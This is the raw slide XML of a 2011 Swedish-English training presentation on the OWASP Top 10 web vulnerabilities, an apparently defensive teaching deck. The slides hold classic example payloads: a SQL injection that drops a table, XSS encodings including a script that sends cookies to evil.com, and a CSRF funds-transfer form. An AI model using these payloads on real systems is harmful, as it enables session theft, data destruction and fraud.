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9D32-D0EC-4A7E-8377-AD2CF2797B78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otalt 1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Orientering nästan inga detalj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x efter sex Ulf dem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ter demo vad kan man göra för att undvika risker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dsdispos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6] Intro, agenda | Sell top-10, emphasize you are recreating the TC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4] Risk based | educate and clarify why those items made it to the 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0] Items 1 – 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30] Live demo (incl switch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5] Items 7 –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5]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En eller flera parameters som pekar ut ett specifikt objet/reco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Query string i GET URL (sänd i e-mai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ttp://www.idg.se/2.1085/1.315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ttp://www.idg.se/2.1085/1.4283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ätt en slumptal i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Kryptera känsliga data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På disk, i /t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ock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änk di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Vid testningen säger användaren ”det alternativet får inte den kattegorin av användare göra”, man tar bort länken men glömer att blockera åtkom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Validera alla redirects (akta för gå förbi access control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Lite inte på Refer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ASP top 10 erkänd standard för best practice in the indust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10 värsta men inte en uttömmande lista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ärspåverkan måste var och en själv bedöm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 behöver dessutom en genomtänkt arkitekt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olera säkerhetskritiska funktioner till en begränsad del av koden – en modul som återanvä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kar ofta utan inlogg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tt om handlednin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 i princip samma åtkomst som din app h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L injection vanlig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t som interpreterar shell, php, per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ärkod lika il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et, db litar helt på applikation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y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d proced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ata valide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0168-C18F-4085-BF8C-B7FB37838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0365-B665-450C-A9BB-1F1E4D78D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7597-BB85-4F35-9849-DB1DD3A5A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37EA-A5F3-4AE0-BAF5-1AE70ECFEA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7C11-FC4C-45D9-B47A-C0EA3C5C19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2226-1A66-4AE4-98E6-CF4247285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0169-893D-4F2A-AA97-193630E86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46D2-DD99-47F2-A913-96DD3A51C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7100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E8D5-4F92-4BA1-9C49-3F3A57CD0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459B-2D8D-40AB-9B00-FB0A4FAD9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4834-35CB-487D-9CEA-538A76428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B6A7-1AB1-4C59-9B77-DDB2EF257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owasp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57200" y="601956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B632-9B3D-4B05-951E-AC277B2B57E3}" type="slidenum">
              <a:rPr b="1" lang="en-US" sz="8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30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952880" y="6270480"/>
            <a:ext cx="30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uln.com/redir.asp?=http://www.links.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vuln.com/redir.asp?=http://www.links.com" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vuln.com/redir.asp?=http://www.links.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vuln.com/redir.asp?=http://www.links.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vuln.com/redir.asp?=http://www.links.com" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vuln.com/redir.asp?=http://www.links.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vuln.com/redir.asp?=http://www.links.com" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://foo.bar/" TargetMode="External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wasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Guide" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/WebGoat" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/WebGoat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WASP top 10 - Ag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bas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10 items 1 – 6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ve dem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10 items 7 – 1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WASP resour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 - Cross site scripting (XSS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35164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24720" y="2492280"/>
            <a:ext cx="11494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&amp;#x003c</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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&amp;#X3c</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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&amp;#x3C</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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000003C;</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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\x3c</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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\x3C</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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\u003c</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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\u003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421000"/>
            <a:ext cx="1149480" cy="24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&lt;</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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%3C</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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&amp;lt</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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&amp;lt;</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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&amp;LT</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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&amp;LT;</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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&amp;#60</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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&amp;#060</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:b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&amp;#60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2781360"/>
            <a:ext cx="45352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&lt;img src=http://site.com onmoseover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&lt;body onload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&lt;IMG SRC=j&amp;#X41vascript:alert('test2')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 Broken authentication and session mngmn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edictable passwords, sessions-ID,  security-qu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ssions-id/credentials i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session-fix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of sessions &amp; logout butt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ssions id outside/inside T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lear text passw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2278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Tahoma"/>
              </a:rPr>
              <a:t>A4 - Insecure direct object reference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88160" cy="1312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2637000"/>
            <a:ext cx="8353440" cy="122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&lt;SELECT name=perio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&lt;OPTION&gt;2010q1&lt;/OP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&lt;OPTION&gt;2011q2&lt;/OP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&lt;/SELEC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5013360"/>
            <a:ext cx="835344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period=2011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4076640"/>
            <a:ext cx="835344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period=2011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5 - Cross-site request forgery (CSRF)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15080" cy="1319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5280" y="2637000"/>
            <a:ext cx="8353440" cy="122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&lt;img src="http://example.com/transferFunds?amount=1500 &amp;destinationAccount=attackersAcct#“width="0" height="0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4076640"/>
            <a:ext cx="8353440" cy="18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&lt;body onload="document.forms[0].submit()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&lt;form method="POST" action="https://bank.com/fn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   </a:t>
            </a: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&lt;input type="hidden" name="sp" value="8109"/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&lt;/form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6 - Security missconfigu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ch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works / librar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ble unnecessar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ck tra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881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Tahoma"/>
              </a:rPr>
              <a:t>A7 - Insecure cryptographig storage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rack on sensitive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word one-way-hashed &amp; sal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word/Key management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LS key pass phr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2M lösenord (obfus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881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8 - Failure to restrict URL acces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ser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/getAccou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/admin/getAccou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4438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Tahoma"/>
              </a:rPr>
              <a:t>A9 - Insufficient transport layer protection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SL/T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ixed cont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ecure cook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FireSheep exploits poor solu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812880"/>
            <a:ext cx="85881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10 - Unvalidated redirects and forward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sv-SE" sz="2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www.vuln.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="sv-SE" sz="2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/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="sv-SE" sz="2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redir.asp?=http</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="sv-SE" sz="28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://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="sv-SE" sz="2800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.links.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="sv-SE" sz="28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http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6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304920" y="812880"/>
            <a:ext cx="85881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WASP resurs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0642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OWASP Secure Software Contract Annex</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="60642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OWASP Developer’s Guide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OWASP Enterprise Security API (ESAPI)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OWASP Software Assurance Maturity Model (SAMM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OWASP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hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>WebGoat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7128000" cy="5964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88000" y="1341360"/>
            <a:ext cx="360036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4869000"/>
            <a:ext cx="1150920" cy="215640"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffff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148428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WASP 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900000" y="1628640"/>
            <a:ext cx="388800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050920" y="1773360"/>
            <a:ext cx="633744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24000" y="1773360"/>
          <a:ext cx="8496000" cy="2701800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1258560"/>
                <a:gridCol w="1495440"/>
                <a:gridCol w="1493640"/>
                <a:gridCol w="1494000"/>
                <a:gridCol w="1495440"/>
                <a:gridCol w="1258920"/>
              </a:tblGrid>
              <a:tr h="58068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r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t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eakness Preval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eakness Detect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chnical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usiness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espr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44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v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44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b2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m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2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2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e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b2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omm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3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arning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analy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chitect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r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LC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dictability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 10 - 201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jection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 site scripting (XS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ken authentication and session management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cure direct object reference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 site request forgery (CSRF)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missconfiguration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cure cryptograpic storage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to restrict URL access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ufficient transoport layer protection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validated redirects and forward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 – Injection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952560"/>
            <a:ext cx="8496000" cy="132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852640"/>
            <a:ext cx="936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2852640"/>
            <a:ext cx="9363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24360" y="2852640"/>
            <a:ext cx="936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3645000"/>
            <a:ext cx="936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342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24360" y="4508640"/>
            <a:ext cx="936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08720" y="4508640"/>
            <a:ext cx="936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140360" y="3141720"/>
            <a:ext cx="151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3500280"/>
            <a:ext cx="1439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40360" y="364500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04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 – Injection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637000"/>
            <a:ext cx="835344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String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") +"'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952560"/>
            <a:ext cx="8496000" cy="1324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4869000"/>
            <a:ext cx="8353440" cy="86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id="foo';DROP accnts;--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SELECT * FROM accnts WHERE ID='foo';DROP accnts;--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3860640"/>
            <a:ext cx="835344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id="foo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SELECT * FROM accnts WHERE ID='foo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 - Cross site scripting (XSS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351640" cy="1304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87280" y="2852640"/>
            <a:ext cx="936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4365720"/>
            <a:ext cx="936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35280" y="3284640"/>
            <a:ext cx="936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3284640"/>
            <a:ext cx="936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342900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1636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716360" y="386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68360" y="3789360"/>
            <a:ext cx="1224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 - Cross site scripting (XSS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351640" cy="1304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5280" y="2492280"/>
            <a:ext cx="835344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(String) page += "&lt;input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'&gt;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4581360"/>
            <a:ext cx="8353440" cy="158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CC=123456789"&gt;&lt;script&gt;window.location=http://evil.com?x=document.cookie&lt;/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&lt;input name='cc' value='123456789“&gt;&lt;script&gt; window.location=http://evil.com?x=document.cookie &lt;/script&gt;'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645000"/>
            <a:ext cx="83534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CC=“123456789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</a:rPr>
              <a:t>&lt;input name='cc' value='123456789'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4076640"/>
            <a:ext cx="1368360" cy="289080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffff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3716280"/>
            <a:ext cx="1368360" cy="289080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffff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4581360"/>
            <a:ext cx="7632720" cy="287640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffff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4869000"/>
            <a:ext cx="4103640" cy="288720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffff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5229360"/>
            <a:ext cx="4537080" cy="287280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffff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5516640"/>
            <a:ext cx="7848720" cy="288720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffff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5805360"/>
            <a:ext cx="1728720" cy="289080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffff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0:12:57Z</dcterms:created>
  <dc:creator>Per Josefsson</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Per Josefsson</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-08-25T12:48:22Z</dcterms:modified>
  <cp:revision>13</cp:revision>
  <dc:subject/>
  <dc:title>Slide 1</dc:title>
</cp:coreProperties>
</file>